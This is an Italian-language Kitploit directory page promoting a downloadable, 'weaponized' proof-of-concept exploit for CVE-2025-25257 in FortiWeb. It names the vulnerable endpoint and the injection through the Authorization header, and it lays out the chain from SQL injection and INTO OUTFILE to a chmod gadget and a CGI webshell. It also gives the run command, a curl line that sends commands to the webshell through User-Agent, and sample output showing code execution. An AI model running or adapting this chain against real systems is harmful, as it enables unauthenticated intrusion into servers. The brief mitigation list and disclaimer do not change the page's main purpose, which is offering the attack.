Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-25257 — PoC per CVE-2025-25257, una critica SQL injection non autenticata in FortiWeb. Sfrutta SQLi tramite l'header Authorization per scrivere una webshell e ottenere RCE. Nessun login richiesto. Completamente automatizzato. | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC per CVE-2025-25257, una critica SQL injection non autenticata in FortiWeb. Sfrutta SQLi tramite l'header Authorization per scrivere una webshell e ottenere RCE. Nessun login richiesto. Completamente automatizzato.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

🚨 CVE-2025-25257 – SQLi in FortiWeb verso RCE

Iniezione SQL critica → Esecuzione di Webshell

Scoperto e armato da 0xgh057r3c0n


🧠 Panoramica della Vulnerabilità

CVE-2025-25257 colpisce i sistemi FortiWeb che espongono l'endpoint /api/fabric/device/status, il quale non sanifica correttamente l'input dell'intestazione Authorization.

Un attaccante può eseguire un'iniezione SQL non autenticata per scrivere una webshell sul server ed eseguire comandi da remoto.


💥 Flusso dell'attacco

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 Endpoint Vulnerabile

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 Caratteristiche dell'Exploit

  • SQLi tramite token Bearer
  • SQL INTO OUTFILE per rilasciare shell
  • L'hook Python attiva chmod
  • Comandi eseguiti tramite User-Agent
  • PoC completamente automatizzato

🧪 Utilizzo

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

Poi:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 Requisiti

  • Python 3.6+
  • Modulo requests

Installa:

root@kitploit:~
pip install requests

📤 Output di Esempio

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 Stima CVSS

MetricaValore
Punteggio di Base9.8 (CRITICAL)
Vettore d'AttaccoNetwork
Privilegi RichiestiNone
Interazione dell'Utente

🛡️ Mitigazione

  • Aggiornare il firmware di FortiWeb (se disponibile patch)
  • Sanificare tutti gli input delle intestazioni
  • Limitare i percorsi di scrittura dei file e l'esecuzione CGI

👨‍💻 Autore

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ Disclaimer

Questa prova di concetto è solo per scopi educativi e test autorizzati. Utilizzare a proprio rischio. L'autore non è responsabile per un uso improprio.


Scarica lo strumento
None
ImpattoHigh (C/I/A)